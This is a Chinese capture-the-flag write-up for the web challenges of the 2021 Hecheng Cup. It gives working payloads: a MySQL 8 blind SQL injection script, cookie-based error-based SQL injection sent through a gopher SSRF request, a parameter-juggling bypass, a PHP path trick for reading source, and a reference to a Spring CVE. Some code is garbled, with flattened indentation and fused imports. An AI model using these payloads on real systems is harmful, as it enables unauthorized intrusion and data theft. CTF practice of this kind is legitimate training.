2021鹤城杯|WEB部分WP

  • A+
所属分类:CTF专场


middle_magic


几个小trcik杂糅在一起的水题

http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23

admin[]=1&root_pwd[]=2&level_3={"result":0}


easy_sql_2


mysql8.0,table statement:

过滤了information_schema.table用mysql.innodb_table_stats

admin'/**/and/**/(('ctf','%s',3,4,5,6)<=/**/(table/**/mysql.innodb_table_stats/**/limit/**/2,1))#

注出来flag表fl11aag

16进制注一下:

import string
import requestsimport time
req = requests.session()
url = "http://182.116.62.85:26571/login.php"
def hh(): payload = "admin'/**/and/**/(ascii(substr(hex((table/**/fl11aag/**/limit/**/1,1)),%s,1)))=%s#"
chars = string.printable.replace(".","").replace("?","").replace("`","").replace("+","") + "_{}"
result = ""
for i in range(1,100): for j in range(48,125): data = {'username':payload%(i,j),'password':"admin"} rep = req.post(url,data) text = rep.text if "success" in text: print(j) result += chr(j) # print((chr(j)),end="") # payload = payload%(chr(j-1)+'%s') print(result) break
hh()

 easy_sql_1

 gopher打index,试了下admin/admin发现给了个cookie,解码后是admin,测试单引号有报错,报错注入,在cookie注入
admin') and updatexml(1,concat(0x7e,(select substr((select flag from flag),1,40))),1)#

Exp:

gopher://127.0.0.1:80/_POST%20/index.php%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0ACookie%3A%20this_is_your_cookie%3DYWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHIoKHNlbGVjdCBmbGFnIGZyb20gZmxhZyksMSw0MCkpKSwxKSM%3D%0D%0AContent-Length%3A%2024%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A


 spring


CVE-2017-4971

xman原题:

https://www.xctf.org.cn/library/details/8ad0f5b6ac740ec0930e948a40f34a67b3d4f565/


easypy

<?phpinclude 'utils.php';
if (isset($_POST['guess'])) { $guess = (string) $_POST['guess']; if ($guess === $secret) { $message = 'Congratulations! The flag is: ' . $flag; } else { $message = 'Wrong. Try Again'; }}
if (preg_match('/utils.php/*$/i', $_SERVER['PHP_SELF'])) { exit("hacker :)");}
if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){ exit("hacker :)");}
if (isset($_GET['show_source'])) { highlight_file(basename($_SERVER['PHP_SELF'])); exit();}else{ show_source(__FILE__);}?>

/index.php/utils.php/%ff?&show.source=1



- END -
2021鹤城杯|WEB部分WP

2021鹤城杯|WEB部分WP

原文始发于微信公众号(山石网科安全技术研究院):2021鹤城杯|WEB部分WP全

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: